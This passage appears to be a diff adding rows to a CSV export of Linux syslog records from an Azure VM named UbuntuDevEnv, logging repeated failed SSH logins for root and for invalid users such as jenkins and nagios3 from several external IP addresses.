+14221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:18,UbuntuDevEnv,2019-06-26 04:55:18,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:18,UbuntuDevEnv,2019-06-26 04:55:18,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:21,UbuntuDevEnv,2019-06-26 04:55:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:23,UbuntuDevEnv,2019-06-26 04:55:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 14567 ssh2,2935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,14567,,
+14225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:38,UbuntuDevEnv,2019-06-26 04:55:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:38,UbuntuDevEnv,2019-06-26 04:55:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 14567: Too many authentication failures [preauth],2935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,14567,,
+14227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:38,UbuntuDevEnv,2019-06-26 04:55:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 14567 ssh2 [preauth],2935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,14567,,
+14228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:38,UbuntuDevEnv,2019-06-26 04:55:37,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 14567 ssh2],2935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,14567,,
+14229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:38,UbuntuDevEnv,2019-06-26 04:55:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:41,UbuntuDevEnv,2019-06-26 04:55:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:43,UbuntuDevEnv,2019-06-26 04:55:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20294 ssh2,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20294,,
+14232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:46,UbuntuDevEnv,2019-06-26 04:55:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20294 ssh2,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20294,,
+14233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:48,UbuntuDevEnv,2019-06-26 04:55:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20294 ssh2,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20294,,
+14234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:49,UbuntuDevEnv,2019-06-26 04:55:49,auth,UbuntuDevEnv,info,Invalid user tex from 119.123.240.8 port 51032,3027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tex,119.123.240.8,51032,,
+14235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:49,UbuntuDevEnv,2019-06-26 04:55:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,3027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+14236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:49,UbuntuDevEnv,2019-06-26 04:55:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:51,UbuntuDevEnv,2019-06-26 04:55:51,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20294 ssh2,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20294,,
+14238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:52,UbuntuDevEnv,2019-06-26 04:55:51,auth,UbuntuDevEnv,info,Failed password for invalid user tex from 119.123.240.8 port 51032 ssh2,3027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tex,119.123.240.8,51032,,
+14239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:52,UbuntuDevEnv,2019-06-26 04:55:51,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 51032:11: Bye Bye [preauth],3027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,51032,,
+14240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:52,UbuntuDevEnv,2019-06-26 04:55:51,auth,UbuntuDevEnv,info,Disconnected from invalid user tex 119.123.240.8 port 51032 [preauth],3027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tex,119.123.240.8,51032,,
+14241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:54,UbuntuDevEnv,2019-06-26 04:55:54,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20294 ssh2,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20294,,
+14242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:56,auth,UbuntuDevEnv,info,Invalid user jenkins from 5.135.161.72 port 40596,3066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,5.135.161.7,40596,,
+14243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,3066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:57,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 20294 ssh2 [preauth],3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20294,,
+14246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:57,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20294 ssh2,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20294,,
+14247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:57,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 20294: Too many authentication failures [preauth],3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,20294,,
+14248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:57,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:57,UbuntuDevEnv,2019-06-26 04:55:57,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:59,UbuntuDevEnv,2019-06-26 04:55:58,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 5.135.161.72 port 40596 ssh2,3066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,5.135.161.7,40596,,
+14251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:59,UbuntuDevEnv,2019-06-26 04:55:58,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 40596:11: Bye Bye [preauth],3066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,40596,,
+14252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:59,UbuntuDevEnv,2019-06-26 04:55:58,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 5.135.161.72 port 40596 [preauth],3066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,5.135.161.7,40596,,
+14253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:00,UbuntuDevEnv,2019-06-26 04:55:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:02,UbuntuDevEnv,2019-06-26 04:56:01,auth,UbuntuDevEnv,info,Invalid user sinusbot123 from 95.216.195.95 port 34786,3084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot123,95.216.195.9,34786,,
+14255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:02,UbuntuDevEnv,2019-06-26 04:56:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:02,UbuntuDevEnv,2019-06-26 04:56:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,3084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+14257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:02,UbuntuDevEnv,2019-06-26 04:56:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 26116 ssh2,3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26116,,
+14258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:04,UbuntuDevEnv,2019-06-26 04:56:04,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot123 from 95.216.195.95 port 34786 ssh2,3084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot123,95.216.195.9,34786,,
+14259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:04,UbuntuDevEnv,2019-06-26 04:56:04,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 34786:11: Bye Bye [preauth],3084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,34786,,
+14260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:04,UbuntuDevEnv,2019-06-26 04:56:04,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot123 95.216.195.95 port 34786 [preauth],3084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot123,95.216.195.9,34786,,
+14261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:06,UbuntuDevEnv,2019-06-26 04:56:05,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 26116 ssh2,3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26116,,
+14262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:17,UbuntuDevEnv,2019-06-26 04:56:17,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 26116: Too many authentication failures [preauth],3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,26116,,
+14263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:17,UbuntuDevEnv,2019-06-26 04:56:17,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 26116 ssh2],3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26116,,
+14264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:17,UbuntuDevEnv,2019-06-26 04:56:17,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:17,UbuntuDevEnv,2019-06-26 04:56:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:17,UbuntuDevEnv,2019-06-26 04:56:17,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 26116 ssh2 [preauth],3077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26116,,
+14267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:20,UbuntuDevEnv,2019-06-26 04:56:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:22,UbuntuDevEnv,2019-06-26 04:56:22,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31793 ssh2,3155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31793,,
+14269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:36,UbuntuDevEnv,2019-06-26 04:56:36,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:36,UbuntuDevEnv,2019-06-26 04:56:36,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 31793 ssh2 [preauth],3155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31793,,
+14271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:36,UbuntuDevEnv,2019-06-26 04:56:36,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 31793: Too many authentication failures [preauth],3155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,31793,,
+14272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:36,UbuntuDevEnv,2019-06-26 04:56:36,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 31793 ssh2],3155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31793,,
+14273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:36,UbuntuDevEnv,2019-06-26 04:56:36,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3155,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:39,UbuntuDevEnv,2019-06-26 04:56:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:41,UbuntuDevEnv,2019-06-26 04:56:40,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37508 ssh2,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37508,,
+14276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:46,UbuntuDevEnv,2019-06-26 04:56:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37508 ssh2,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37508,,
+14277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:46,UbuntuDevEnv,2019-06-26 04:56:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37508 ssh2,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37508,,
+14278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:48,UbuntuDevEnv,2019-06-26 04:56:48,auth,UbuntuDevEnv,info,Invalid user nagios3 from 200.6.188.38 port 14830,3253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios3,200.6.188.3,14830,,
+14279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:48,UbuntuDevEnv,2019-06-26 04:56:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,3253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
